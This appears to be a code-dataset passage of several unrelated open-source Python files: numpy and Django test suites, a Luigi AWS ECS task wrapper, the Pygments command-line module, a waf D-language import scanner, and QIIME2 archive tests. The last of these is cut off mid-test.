assert a.dot(a) == t(14), \
"Problem with dot product with array of type %s" % k
def test_clip( self ):
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 5, dtype=t )
b = a.clip( 2, 3 )
x = np.array( [2,2,2,3,3], dtype=t )
assert_equal( b, x )
def test_clip_bool( self ):
a = np.array( [False, True], np.bool )
assert_equal( a.clip(False,False), [False, False] )
def test_array_casting( self ):
for k,t in enumerate( alltypes ):
a = np.array( [ t(1) ] )
for k2, t2 in enumerate( alltypes ):
b = a.astype( t2 )
if k2 < len(types):
assert b[0] == 1, \
"Busted array type casting: k=%d k2=%d" % (k,k2)
else:
# Casting to datetime64 yields a 1/1/1970+... result,
# which isn't so hot for checking against "1". So, in
# these cases, just cast back to the starting time, and
# make sure we got back what we started with.
c = b.astype( t )
assert_equal( c, a )
def test_take( self ):
# Test all types, but skipp np.bool_ for now, as it lacks a fill
# function. Grrr.
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 10, dtype=t )
idx = np.arange(5) * 2
c = np.take( a, idx )
assert_equal( c, a[::2] )
def test_putmask( self ):
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 5, dtype=t )
mask = np.zeros( 5, dtype=np.bool )
mask[::2] = True
np.putmask( a, mask, t(8) )
x = np.array( [8,1,8,3,8], dtype=t )
assert_equal( a, x )
def test_fillwithscalar( self ):
a = np.empty( 2, dtype=np.datetime64 )
a.fill( np.datetime64( 3 ) )
x = np.zeros( 2, dtype=np.datetime64 ) + 3
assert_equal( a, x )
if __name__ == "__main__":
run_module_suite()
| gpl-3.0 | -904,031,484,609,910,100 | 28.467337 | 77 | 0.496419 | false |
vitan/hue | desktop/core/ext-py/Django-1.6.10/django/contrib/messages/tests/base.py | 104 | 14243 | from django import http
from django.conf import settings, global_settings
from django.contrib.messages import constants, utils, get_level, set_level
from django.contrib.messages.api import MessageFailure
from django.contrib.messages.storage import default_storage, base
from django.contrib.messages.storage.base import Message
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
from django.utils.translation import ugettext_lazy
from django.utils.unittest import skipIf
def skipUnlessAuthIsInstalled(func):
return skipIf(
'django.contrib.auth' not in settings.INSTALLED_APPS,
"django.contrib.auth isn't installed")(func)
def add_level_messages(storage):
"""
Adds 6 messages from different levels (including a custom one) to a storage
instance.
"""
storage.add(constants.INFO, 'A generic info message')
storage.add(29, 'Some custom level')
storage.add(constants.DEBUG, 'A debugging message', extra_tags='extra-tag')
storage.add(constants.WARNING, 'A warning')
storage.add(constants.ERROR, 'An error')
storage.add(constants.SUCCESS, 'This was a triumph.')
class override_settings_tags(override_settings):
def enable(self):
super(override_settings_tags, self).enable()
# LEVEL_TAGS is a constant defined in the
# django.contrib.messages.storage.base module, so after changing
# settings.MESSAGE_TAGS, we need to update that constant too.
self.old_level_tags = base.LEVEL_TAGS
base.LEVEL_TAGS = utils.get_level_tags()
def disable(self):
super(override_settings_tags, self).disable()
base.LEVEL_TAGS = self.old_level_tags
class BaseTests(object):
storage_class = default_storage
urls = 'django.contrib.messages.tests.urls'
levels = {
'debug': constants.DEBUG,
'info': constants.INFO,
'success': constants.SUCCESS,
'warning': constants.WARNING,
'error': constants.ERROR,
}
def setUp(self):
self.settings_override = override_settings_tags(
TEMPLATE_DIRS = (),
TEMPLATE_CONTEXT_PROCESSORS = global_settings.TEMPLATE_CONTEXT_PROCESSORS,
MESSAGE_TAGS = '',
MESSAGE_STORAGE = '%s.%s' % (self.storage_class.__module__,
self.storage_class.__name__),
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer',
)
self.settings_override.enable()
def tearDown(self):
self.settings_override.disable()
def get_request(self):
return http.HttpRequest()
def get_response(self):
return http.HttpResponse()
def get_storage(self, data=None):
"""
Returns the storage backend, setting its loaded data to the ``data``
argument.
This method avoids the storage ``_get`` method from getting called so
that other parts of the storage backend can be tested independent of
the message retrieval logic.
"""
storage = self.storage_class(self.get_request())
storage._loaded_data = data or []
return storage
def test_add(self):
storage = self.get_storage()
self.assertFalse(storage.added_new)
storage.add(constants.INFO, 'Test message 1')
self.assertTrue(storage.added_new)
storage.add(constants.INFO, 'Test message 2', extra_tags='tag')
self.assertEqual(len(storage), 2)
def test_add_lazy_translation(self):
storage = self.get_storage()
response = self.get_response()
storage.add(constants.INFO, ugettext_lazy('lazy message'))
storage.update(response)
storing = self.stored_messages_count(storage, response)
self.assertEqual(storing, 1)
def test_no_update(self):
storage = self.get_storage()
response = self.get_response()
storage.update(response)
storing = self.stored_messages_count(storage, response)
self.assertEqual(storing, 0)
def test_add_update(self):
storage = self.get_storage()
response = self.get_response()
storage.add(constants.INFO, 'Test message 1')
storage.add(constants.INFO, 'Test message 1', extra_tags='tag')
storage.update(response)
storing = self.stored_messages_count(storage, response)
self.assertEqual(storing, 2)
def test_existing_add_read_update(self):
storage = self.get_existing_storage()
response = self.get_response()
storage.add(constants.INFO, 'Test message 3')
list(storage) # Simulates a read
storage.update(response)
storing = self.stored_messages_count(storage, response)
self.assertEqual(storing, 0)
def test_existing_read_add_update(self):
storage = self.get_existing_storage()
response = self.get_response()
list(storage) # Simulates a read
storage.add(constants.INFO, 'Test message 3')
storage.update(response)
storing = self.stored_messages_count(storage, response)
self.assertEqual(storing, 1)
@override_settings(MESSAGE_LEVEL=constants.DEBUG)
def test_full_request_response_cycle(self):
"""
With the message middleware enabled, tests that messages are properly
stored and then retrieved across the full request/redirect/response
cycle.
"""
data = {
'messages': ['Test message %d' % x for x in range(5)],
}
show_url = reverse('django.contrib.messages.tests.urls.show')
for level in ('debug', 'info', 'success', 'warning', 'error'):
add_url = reverse('django.contrib.messages.tests.urls.add',
args=(level,))
response = self.client.post(add_url, data, follow=True)
self.assertRedirects(response, show_url)
self.assertTrue('messages' in response.context)
messages = [Message(self.levels[level], msg) for msg in
data['messages']]
self.assertEqual(list(response.context['messages']), messages)
for msg in data['messages']:
self.assertContains(response, msg)
@override_settings(MESSAGE_LEVEL=constants.DEBUG)
def test_with_template_response(self):
data = {
'messages': ['Test message %d' % x for x in range(5)],
}
show_url = reverse('django.contrib.messages.tests.urls.show_template_response')
for level in self.levels.keys():
add_url = reverse('django.contrib.messages.tests.urls.add_template_response',
args=(level,))
response = self.client.post(add_url, data, follow=True)
self.assertRedirects(response, show_url)
self.assertTrue('messages' in response.context)
for msg in data['messages']:
self.assertContains(response, msg)
# there shouldn't be any messages on second GET request
response = self.client.get(show_url)
for msg in data['messages']:
self.assertNotContains(response, msg)
@override_settings(MESSAGE_LEVEL=constants.DEBUG)
def test_multiple_posts(self):
"""
Tests that messages persist properly when multiple POSTs are made
before a GET.
"""
data = {
'messages': ['Test message %d' % x for x in range(5)],
}
show_url = reverse('django.contrib.messages.tests.urls.show')
messages = []
for level in ('debug', 'info', 'success', 'warning', 'error'):
messages.extend([Message(self.levels[level], msg) for msg in
data['messages']])
add_url = reverse('django.contrib.messages.tests.urls.add',
args=(level,))
self.client.post(add_url, data)
response = self.client.get(show_url)
self.assertTrue('messages' in response.context)
self.assertEqual(list(response.context['messages']), messages)
for msg in data['messages']:
self.assertContains(response, msg)
@override_settings(
INSTALLED_APPS=filter(
lambda app:app!='django.contrib.messages', settings.INSTALLED_APPS),
MIDDLEWARE_CLASSES=filter(
lambda m:'MessageMiddleware' not in m, settings.MIDDLEWARE_CLASSES),
TEMPLATE_CONTEXT_PROCESSORS=filter(
lambda p:'context_processors.messages' not in p,
settings.TEMPLATE_CONTEXT_PROCESSORS),
MESSAGE_LEVEL=constants.DEBUG
)
def test_middleware_disabled(self):
"""
Tests that, when the middleware is disabled, an exception is raised
when one attempts to store a message.
"""
data = {
'messages': ['Test message %d' % x for x in range(5)],
}
show_url = reverse('django.contrib.messages.tests.urls.show')
for level in ('debug', 'info', 'success', 'warning', 'error'):
add_url = reverse('django.contrib.messages.tests.urls.add',
args=(level,))
self.assertRaises(MessageFailure, self.client.post, add_url,
data, follow=True)
@override_settings(
INSTALLED_APPS=filter(
lambda app:app!='django.contrib.messages', settings.INSTALLED_APPS),
MIDDLEWARE_CLASSES=filter(
lambda m:'MessageMiddleware' not in m, settings.MIDDLEWARE_CLASSES),
TEMPLATE_CONTEXT_PROCESSORS=filter(
lambda p:'context_processors.messages' not in p,
settings.TEMPLATE_CONTEXT_PROCESSORS),
MESSAGE_LEVEL=constants.DEBUG
)
def test_middleware_disabled_fail_silently(self):
"""
Tests that, when the middleware is disabled, an exception is not
raised if 'fail_silently' = True
"""
data = {
'messages': ['Test message %d' % x for x in range(5)],
'fail_silently': True,
}
show_url = reverse('django.contrib.messages.tests.urls.show')
for level in ('debug', 'info', 'success', 'warning', 'error'):
add_url = reverse('django.contrib.messages.tests.urls.add',
args=(level,))
response = self.client.post(add_url, data, follow=True)
self.assertRedirects(response, show_url)
self.assertFalse('messages' in response.context)
def stored_messages_count(self, storage, response):
"""
Returns the number of messages being stored after a
``storage.update()`` call.
"""
raise NotImplementedError('This method must be set by a subclass.')
def test_get(self):
raise NotImplementedError('This method must be set by a subclass.')
def get_existing_storage(self):
return self.get_storage([Message(constants.INFO, 'Test message 1'),
Message(constants.INFO, 'Test message 2',
extra_tags='tag')])
def test_existing_read(self):
"""
Tests that reading the existing storage doesn't cause the data to be
lost.
"""
storage = self.get_existing_storage()
self.assertFalse(storage.used)
# After iterating the storage engine directly, the used flag is set.
data = list(storage)
self.assertTrue(storage.used)
# The data does not disappear because it has been iterated.
self.assertEqual(data, list(storage))
def test_existing_add(self):
storage = self.get_existing_storage()
self.assertFalse(storage.added_new)
storage.add(constants.INFO, 'Test message 3')
self.assertTrue(storage.added_new)
def test_default_level(self):
# get_level works even with no storage on the request.
request = self.get_request()
self.assertEqual(get_level(request), constants.INFO)
# get_level returns the default level if it hasn't been set.
storage = self.get_storage()
request._messages = storage
self.assertEqual(get_level(request), constants.INFO)
# Only messages of sufficient level get recorded.
add_level_messages(storage)
self.assertEqual(len(storage), 5)
def test_low_level(self):
request = self.get_request()
storage = self.storage_class(request)
request._messages = storage
self.assertTrue(set_level(request, 5))
self.assertEqual(get_level(request), 5)
add_level_messages(storage)
self.assertEqual(len(storage), 6)
def test_high_level(self):
request = self.get_request()
storage = self.storage_class(request)
request._messages = storage
self.assertTrue(set_level(request, 30))
self.assertEqual(get_level(request), 30)
add_level_messages(storage)
self.assertEqual(len(storage), 2)
@override_settings(MESSAGE_LEVEL=29)
def test_settings_level(self):
request = self.get_request()
storage = self.storage_class(request)
self.assertEqual(get_level(request), 29)
add_level_messages(storage)
self.assertEqual(len(storage), 3)
def test_tags(self):
storage = self.get_storage()
storage.level = 0
add_level_messages(storage)
tags = [msg.tags for msg in storage]
self.assertEqual(tags,
['info', '', 'extra-tag debug', 'warning', 'error',
'success'])
@override_settings_tags(MESSAGE_TAGS={
constants.INFO: 'info',
constants.DEBUG: '',
constants.WARNING: '',
constants.ERROR: 'bad',
29: 'custom',
}
)
def test_custom_tags(self):
storage = self.get_storage()
storage.level = 0
add_level_messages(storage)
tags = [msg.tags for msg in storage]
self.assertEqual(tags,
['info', 'custom', 'extra-tag', '', 'bad', 'success'])
| apache-2.0 | -7,543,876,509,021,500,000 | 37.703804 | 89 | 0.609633 | false |
ContextLogic/luigi | luigi/contrib/ecs.py | 17 | 6185 | # -*- coding: utf-8 -*-
#
# Copyright 2015 Outlier Bio, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
EC2 Container Service wrapper for Luigi
From the AWS website:
Amazon EC2 Container Service (ECS) is a highly scalable, high performance
container management service that supports Docker containers and allows you
to easily run applications on a managed cluster of Amazon EC2 instances.
To use ECS, you create a taskDefinition_ JSON that defines the `docker run`_
command for one or more containers in a task or service, and then submit this
JSON to the API to run the task.
This `boto3-powered`_ wrapper allows you to create Luigi Tasks to submit ECS
``taskDefinition`` s. You can either pass a dict (mapping directly to the
``taskDefinition`` JSON) OR an Amazon Resource Name (arn) for a previously
registered ``taskDefinition``.
Requires:
- boto3 package
- Amazon AWS credentials discoverable by boto3 (e.g., by using ``aws configure``
from awscli_)
- A running ECS cluster (see `ECS Get Started`_)
Written and maintained by Jake Feala (@jfeala) for Outlier Bio (@outlierbio)
.. _`docker run`: https://docs.docker.com/reference/commandline/run
.. _taskDefinition: http://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_defintions.html
.. _`boto3-powered`: https://boto3.readthedocs.io
.. _awscli: https://aws.amazon.com/cli
.. _`ECS Get Started`: http://docs.aws.amazon.com/AmazonECS/latest/developerguide/ECS_GetStarted.html
"""
import time
import logging
import luigi
logger = logging.getLogger('luigi-interface')
try:
import boto3
client = boto3.client('ecs')
except ImportError:
logger.warning('boto3 is not installed. ECSTasks require boto3')
POLL_TIME = 2
def _get_task_statuses(task_ids):
"""
Retrieve task statuses from ECS API
Returns list of {RUNNING|PENDING|STOPPED} for each id in task_ids
"""
response = client.describe_tasks(tasks=task_ids)
# Error checking
if response['failures'] != []:
raise Exception('There were some failures:\n{0}'.format(
response['failures']))
status_code = response['ResponseMetadata']['HTTPStatusCode']
if status_code != 200:
msg = 'Task status request received status code {0}:\n{1}'
raise Exception(msg.format(status_code, response))
return [t['lastStatus'] for t in response['tasks']]
def _track_tasks(task_ids):
"""Poll task status until STOPPED"""
while True:
statuses = _get_task_statuses(task_ids)
if all([status == 'STOPPED' for status in statuses]):
logger.info('ECS tasks {0} STOPPED'.format(','.join(task_ids)))
break
time.sleep(POLL_TIME)
logger.debug('ECS task status for tasks {0}: {1}'.format(
','.join(task_ids), status))
class ECSTask(luigi.Task):
"""
Base class for an Amazon EC2 Container Service Task
Amazon ECS requires you to register "tasks", which are JSON descriptions
for how to issue the ``docker run`` command. This Luigi Task can either
run a pre-registered ECS taskDefinition, OR register the task on the fly
from a Python dict.
:param task_def_arn: pre-registered task definition ARN (Amazon Resource
Name), of the form::
arn:aws:ecs:<region>:<user_id>:task-definition/<family>:<tag>
:param task_def: dict describing task in taskDefinition JSON format, for
example::
task_def = {
'family': 'hello-world',
'volumes': [],
'containerDefinitions': [
{
'memory': 1,
'essential': True,
'name': 'hello-world',
'image': 'ubuntu',
'command': ['/bin/echo', 'hello world']
}
]
}
"""
task_def_arn = luigi.Parameter(default=None)
task_def = luigi.Parameter(default=None)
@property
def ecs_task_ids(self):
"""Expose the ECS task ID"""
if hasattr(self, '_task_ids'):
return self._task_ids
@property
def command(self):
"""
Command passed to the containers
Override to return list of dicts with keys 'name' and 'command',
describing the container names and commands to pass to the container.
Directly corresponds to the `overrides` parameter of runTask API. For
example::
[
{
'name': 'myContainer',
'command': ['/bin/sleep', '60']
}
]
"""
pass
def run(self):
if (not self.task_def and not self.task_def_arn) or \
(self.task_def and self.task_def_arn):
raise ValueError(('Either (but not both) a task_def (dict) or'
'task_def_arn (string) must be assigned'))
if not self.task_def_arn:
# Register the task and get assigned taskDefinition ID (arn)
response = client.register_task_definition(**self.task_def)
self.task_def_arn = response['taskDefinition']['taskDefinitionArn']
# Submit the task to AWS ECS and get assigned task ID
# (list containing 1 string)
if self.command:
overrides = {'containerOverrides': self.command}
else:
overrides = {}
response = client.run_task(taskDefinition=self.task_def_arn,
overrides=overrides)
self._task_ids = [task['taskArn'] for task in response['tasks']]
# Wait on task completion
_track_tasks(self._task_ids)
| apache-2.0 | -8,793,460,644,669,075,000 | 32.61413 | 101 | 0.627648 | false |
amghost/myblog | node_modules/pygmentize-bundled/vendor/pygments/build-3.3/pygments/cmdline.py | 95 | 13621 | # -*- coding: utf-8 -*-
"""
pygments.cmdline
~~~~~~~~~~~~~~~~
Command line interface.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import sys
import getopt
from textwrap import dedent
from pygments import __version__, highlight
from pygments.util import ClassNotFound, OptionError, docstring_headline
from pygments.lexers import get_all_lexers, get_lexer_by_name, get_lexer_for_filename, \
find_lexer_class, guess_lexer, TextLexer
from pygments.formatters import get_all_formatters, get_formatter_by_name, \
get_formatter_for_filename, find_formatter_class, \
TerminalFormatter # pylint:disable-msg=E0611
from pygments.filters import get_all_filters, find_filter_class
from pygments.styles import get_all_styles, get_style_by_name
USAGE = """\
Usage: %s [-l <lexer> | -g] [-F <filter>[:<options>]] [-f <formatter>]
[-O <options>] [-P <option=value>] [-o <outfile>] [<infile>]
%s -S <style> -f <formatter> [-a <arg>] [-O <options>] [-P <option=value>]
%s -L [<which> ...]
%s -N <filename>
%s -H <type> <name>
%s -h | -V
Highlight the input file and write the result to <outfile>.
If no input file is given, use stdin, if -o is not given, use stdout.
<lexer> is a lexer name (query all lexer names with -L). If -l is not
given, the lexer is guessed from the extension of the input file name
(this obviously doesn't work if the input is stdin). If -g is passed,
attempt to guess the lexer from the file contents, or pass through as
plain text if this fails (this can work for stdin).
Likewise, <formatter> is a formatter name, and will be guessed from
the extension of the output file name. If no output file is given,
the terminal formatter will be used by default.
With the -O option, you can give the lexer and formatter a comma-
separated list of options, e.g. ``-O bg=light,python=cool``.
The -P option adds lexer and formatter options like the -O option, but
you can only give one option per -P. That way, the option value may
contain commas and equals signs, which it can't with -O, e.g.
``-P "heading=Pygments, the Python highlighter".
With the -F option, you can add filters to the token stream, you can
give options in the same way as for -O after a colon (note: there must
not be spaces around the colon).
The -O, -P and -F options can be given multiple times.
With the -S option, print out style definitions for style <style>
for formatter <formatter>. The argument given by -a is formatter
dependent.
The -L option lists lexers, formatters, styles or filters -- set
`which` to the thing you want to list (e.g. "styles"), or omit it to
list everything.
The -N option guesses and prints out a lexer name based solely on
the given filename. It does not take input or highlight anything.
If no specific lexer can be determined "text" is returned.
The -H option prints detailed help for the object <name> of type <type>,
where <type> is one of "lexer", "formatter" or "filter".
The -h option prints this help.
The -V option prints the package version.
"""
def _parse_options(o_strs):
opts = {}
if not o_strs:
return opts
for o_str in o_strs:
if not o_str:
continue
o_args = o_str.split(',')
for o_arg in o_args:
o_arg = o_arg.strip()
try:
o_key, o_val = o_arg.split('=')
o_key = o_key.strip()
o_val = o_val.strip()
except ValueError:
opts[o_arg] = True
else:
opts[o_key] = o_val
return opts
def _parse_filters(f_strs):
filters = []
if not f_strs:
return filters
for f_str in f_strs:
if ':' in f_str:
fname, fopts = f_str.split(':', 1)
filters.append((fname, _parse_options([fopts])))
else:
filters.append((f_str, {}))
return filters
def _print_help(what, name):
try:
if what == 'lexer':
cls = find_lexer_class(name)
print("Help on the %s lexer:" % cls.name)
print(dedent(cls.__doc__))
elif what == 'formatter':
cls = find_formatter_class(name)
print("Help on the %s formatter:" % cls.name)
print(dedent(cls.__doc__))
elif what == 'filter':
cls = find_filter_class(name)
print("Help on the %s filter:" % name)
print(dedent(cls.__doc__))
except AttributeError:
print("%s not found!" % what, file=sys.stderr)
def _print_list(what):
if what == 'lexer':
print()
print("Lexers:")
print("~~~~~~~")
info = []
for fullname, names, exts, _ in get_all_lexers():
tup = (', '.join(names)+':', fullname,
exts and '(filenames ' + ', '.join(exts) + ')' or '')
info.append(tup)
info.sort()
for i in info:
print(('* %s\n %s %s') % i)
elif what == 'formatter':
print()
print("Formatters:")
print("~~~~~~~~~~~")
info = []
for cls in get_all_formatters():
doc = docstring_headline(cls)
tup = (', '.join(cls.aliases) + ':', doc, cls.filenames and
'(filenames ' + ', '.join(cls.filenames) + ')' or '')
info.append(tup)
info.sort()
for i in info:
print(('* %s\n %s %s') % i)
elif what == 'filter':
print()
print("Filters:")
print("~~~~~~~~")
for name in get_all_filters():
cls = find_filter_class(name)
print("* " + name + ':')
print(" %s" % docstring_headline(cls))
elif what == 'style':
print()
print("Styles:")
print("~~~~~~~")
for name in get_all_styles():
cls = get_style_by_name(name)
print("* " + name + ':')
print(" %s" % docstring_headline(cls))
def main(args=sys.argv):
"""
Main command line entry point.
"""
# pylint: disable-msg=R0911,R0912,R0915
usage = USAGE % ((args[0],) * 6)
if sys.platform in ['win32', 'cygwin']:
try:
# Provide coloring under Windows, if possible
import colorama
colorama.init()
except ImportError:
pass
try:
popts, args = getopt.getopt(args[1:], "l:f:F:o:O:P:LS:a:N:hVHg")
except getopt.GetoptError as err:
print(usage, file=sys.stderr)
return 2
opts = {}
O_opts = []
P_opts = []
F_opts = []
for opt, arg in popts:
if opt == '-O':
O_opts.append(arg)
elif opt == '-P':
P_opts.append(arg)
elif opt == '-F':
F_opts.append(arg)
opts[opt] = arg
if not opts and not args:
print(usage)
return 0
if opts.pop('-h', None) is not None:
print(usage)
return 0
if opts.pop('-V', None) is not None:
print('Pygments version %s, (c) 2006-2013 by Georg Brandl.' % __version__)
return 0
# handle ``pygmentize -L``
L_opt = opts.pop('-L', None)
if L_opt is not None:
if opts:
print(usage, file=sys.stderr)
return 2
# print version
main(['', '-V'])
if not args:
args = ['lexer', 'formatter', 'filter', 'style']
for arg in args:
_print_list(arg.rstrip('s'))
return 0
# handle ``pygmentize -H``
H_opt = opts.pop('-H', None)
if H_opt is not None:
if opts or len(args) != 2:
print(usage, file=sys.stderr)
return 2
what, name = args
if what not in ('lexer', 'formatter', 'filter'):
print(usage, file=sys.stderr)
return 2
_print_help(what, name)
return 0
# parse -O options
parsed_opts = _parse_options(O_opts)
opts.pop('-O', None)
# parse -P options
for p_opt in P_opts:
try:
name, value = p_opt.split('=', 1)
except ValueError:
parsed_opts[p_opt] = True
else:
parsed_opts[name] = value
opts.pop('-P', None)
# handle ``pygmentize -N``
infn = opts.pop('-N', None)
if infn is not None:
try:
lexer = get_lexer_for_filename(infn, **parsed_opts)
except ClassNotFound as err:
lexer = TextLexer()
except OptionError as err:
print('Error:', err, file=sys.stderr)
return 1
print(lexer.aliases[0])
return 0
# handle ``pygmentize -S``
S_opt = opts.pop('-S', None)
a_opt = opts.pop('-a', None)
if S_opt is not None:
f_opt = opts.pop('-f', None)
if not f_opt:
print(usage, file=sys.stderr)
return 2
if opts or args:
print(usage, file=sys.stderr)
return 2
try:
parsed_opts['style'] = S_opt
fmter = get_formatter_by_name(f_opt, **parsed_opts)
except ClassNotFound as err:
print(err, file=sys.stderr)
return 1
arg = a_opt or ''
try:
print(fmter.get_style_defs(arg))
except Exception as err:
print('Error:', err, file=sys.stderr)
return 1
return 0
# if no -S is given, -a is not allowed
if a_opt is not None:
print(usage, file=sys.stderr)
return 2
# parse -F options
F_opts = _parse_filters(F_opts)
opts.pop('-F', None)
# select formatter
outfn = opts.pop('-o', None)
fmter = opts.pop('-f', None)
if fmter:
try:
fmter = get_formatter_by_name(fmter, **parsed_opts)
except (OptionError, ClassNotFound) as err:
print('Error:', err, file=sys.stderr)
return 1
if outfn:
if not fmter:
try:
fmter = get_formatter_for_filename(outfn, **parsed_opts)
except (OptionError, ClassNotFound) as err:
print('Error:', err, file=sys.stderr)
return 1
try:
outfile = open(outfn, 'wb')
except Exception as err:
print('Error: cannot open outfile:', err, file=sys.stderr)
return 1
else:
if not fmter:
fmter = TerminalFormatter(**parsed_opts)
outfile = sys.stdout
# select lexer
lexer = opts.pop('-l', None)
if lexer:
try:
lexer = get_lexer_by_name(lexer, **parsed_opts)
except (OptionError, ClassNotFound) as err:
print('Error:', err, file=sys.stderr)
return 1
if args:
if len(args) > 1:
print(usage, file=sys.stderr)
return 2
infn = args[0]
try:
code = open(infn, 'rb').read()
except Exception as err:
print('Error: cannot read infile:', err, file=sys.stderr)
return 1
if not lexer:
try:
lexer = get_lexer_for_filename(infn, code, **parsed_opts)
except ClassNotFound as err:
if '-g' in opts:
try:
lexer = guess_lexer(code, **parsed_opts)
except ClassNotFound:
lexer = TextLexer(**parsed_opts)
else:
print('Error:', err, file=sys.stderr)
return 1
except OptionError as err:
print('Error:', err, file=sys.stderr)
return 1
else:
if '-g' in opts:
code = sys.stdin.read()
try:
lexer = guess_lexer(code, **parsed_opts)
except ClassNotFound:
lexer = TextLexer(**parsed_opts)
elif not lexer:
print('Error: no lexer name given and reading ' + \
'from stdin (try using -g or -l <lexer>)', file=sys.stderr)
return 2
else:
code = sys.stdin.read()
# No encoding given? Use latin1 if output file given,
# stdin/stdout encoding otherwise.
# (This is a compromise, I'm not too happy with it...)
if 'encoding' not in parsed_opts and 'outencoding' not in parsed_opts:
if outfn:
# encoding pass-through
fmter.encoding = 'latin1'
else:
if sys.version_info < (3,):
# use terminal encoding; Python 3's terminals already do that
lexer.encoding = getattr(sys.stdin, 'encoding',
None) or 'ascii'
fmter.encoding = getattr(sys.stdout, 'encoding',
None) or 'ascii'
elif not outfn and sys.version_info > (3,):
# output to terminal with encoding -> use .buffer
outfile = sys.stdout.buffer
# ... and do it!
try:
# process filters
for fname, fopts in F_opts:
lexer.add_filter(fname, **fopts)
highlight(code, lexer, fmter, outfile)
except Exception as err:
import traceback
info = traceback.format_exception(*sys.exc_info())
msg = info[-1].strip()
if len(info) >= 3:
# extract relevant file and position info
msg += '\n (f%s)' % info[-2].split('\n')[0].strip()[1:]
print(file=sys.stderr)
print('*** Error while highlighting:', file=sys.stderr)
print(msg, file=sys.stderr)
return 1
return 0
| mit | -6,413,053,661,395,489,000 | 29.886621 | 91 | 0.537552 | false |
RadioFreeAsia/RDacity | lib-src/lv2/suil/waflib/Tools/d_scan.py | 292 | 3029 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import re
from waflib import Utils,Logs
def filter_comments(filename):
txt=Utils.readf(filename)
i=0
buf=[]
max=len(txt)
begin=0
while i<max:
c=txt[i]
if c=='"'or c=="'":
buf.append(txt[begin:i])
delim=c
i+=1
while i<max:
c=txt[i]
if c==delim:break
elif c=='\\':
i+=1
i+=1
i+=1
begin=i
elif c=='/':
buf.append(txt[begin:i])
i+=1
if i==max:break
c=txt[i]
if c=='+':
i+=1
nesting=1
c=None
while i<max:
prev=c
c=txt[i]
if prev=='/'and c=='+':
nesting+=1
c=None
elif prev=='+'and c=='/':
nesting-=1
if nesting==0:break
c=None
i+=1
elif c=='*':
i+=1
c=None
while i<max:
prev=c
c=txt[i]
if prev=='*'and c=='/':break
i+=1
elif c=='/':
i+=1
while i<max and txt[i]!='\n':
i+=1
else:
begin=i-1
continue
i+=1
begin=i
buf.append(' ')
else:
i+=1
buf.append(txt[begin:])
return buf
class d_parser(object):
def __init__(self,env,incpaths):
self.allnames=[]
self.re_module=re.compile("module\s+([^;]+)")
self.re_import=re.compile("import\s+([^;]+)")
self.re_import_bindings=re.compile("([^:]+):(.*)")
self.re_import_alias=re.compile("[^=]+=(.+)")
self.env=env
self.nodes=[]
self.names=[]
self.incpaths=incpaths
def tryfind(self,filename):
found=0
for n in self.incpaths:
found=n.find_resource(filename.replace('.','/')+'.d')
if found:
self.nodes.append(found)
self.waiting.append(found)
break
if not found:
if not filename in self.names:
self.names.append(filename)
def get_strings(self,code):
self.module=''
lst=[]
mod_name=self.re_module.search(code)
if mod_name:
self.module=re.sub('\s+','',mod_name.group(1))
import_iterator=self.re_import.finditer(code)
if import_iterator:
for import_match in import_iterator:
import_match_str=re.sub('\s+','',import_match.group(1))
bindings_match=self.re_import_bindings.match(import_match_str)
if bindings_match:
import_match_str=bindings_match.group(1)
matches=import_match_str.split(',')
for match in matches:
alias_match=self.re_import_alias.match(match)
if alias_match:
match=alias_match.group(1)
lst.append(match)
return lst
def start(self,node):
self.waiting=[node]
while self.waiting:
nd=self.waiting.pop(0)
self.iter(nd)
def iter(self,node):
path=node.abspath()
code="".join(filter_comments(path))
names=self.get_strings(code)
for x in names:
if x in self.allnames:continue
self.allnames.append(x)
self.tryfind(x)
def scan(self):
env=self.env
gruik=d_parser(env,self.generator.includes_nodes)
node=self.inputs[0]
gruik.start(node)
nodes=gruik.nodes
names=gruik.names
if Logs.verbose:
Logs.debug('deps: deps for %s: %r; unresolved %r'%(str(node),nodes,names))
return(nodes,names)
| gpl-2.0 | -7,910,437,893,230,303,000 | 21.774436 | 102 | 0.614064 | false |
jakereps/qiime2 | qiime2/core/archive/format/tests/test_v0.py | 2 | 2307 | # ----------------------------------------------------------------------------
# Copyright (c) 2016-2021, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import unittest
import tempfile
import uuid as _uuid
import pathlib
import io
from qiime2.core.testing.type import IntSequence1
from qiime2.core.testing.format import IntSequenceDirectoryFormat
from qiime2.core.archive.archiver import _ZipArchive, ArchiveRecord
from qiime2.core.archive.format.v0 import ArchiveFormat
class TestArchiveFormat(unittest.TestCase):
def setUp(self):
prefix = "qiime2-test-temp-"
self.temp_dir = tempfile.TemporaryDirectory(prefix=prefix)
def test_format_metadata(self):
uuid = _uuid.uuid4()
with io.StringIO() as fh:
ArchiveFormat._format_metadata(fh, uuid, IntSequence1,
IntSequenceDirectoryFormat)
result = fh.getvalue()
self.assertEqual(result,
"uuid: %s\ntype: IntSequence1\nformat: "
"IntSequenceDirectoryFormat\n" % uuid)
def test_format_metadata_none(self):
uuid = _uuid.uuid4()
with io.StringIO() as fh:
ArchiveFormat._format_metadata(fh, uuid, IntSequence1, None)
result = fh.getvalue()
self.assertEqual(result,
"uuid: %s\ntype: IntSequence1\nformat: null\n" % uuid)
def test_load_root_dir_metadata_uuid_mismatch(self):
fp = pathlib.Path(self.temp_dir.name) / 'root-dir-metadata-mismatch'
fp.mkdir()
r = _ZipArchive.setup(fp, 'foo', 'bar')
fake = ArchiveRecord(r.root, r.version_fp,
_uuid.uuid4(), # This will trick the format
r.version, r.framework_version)
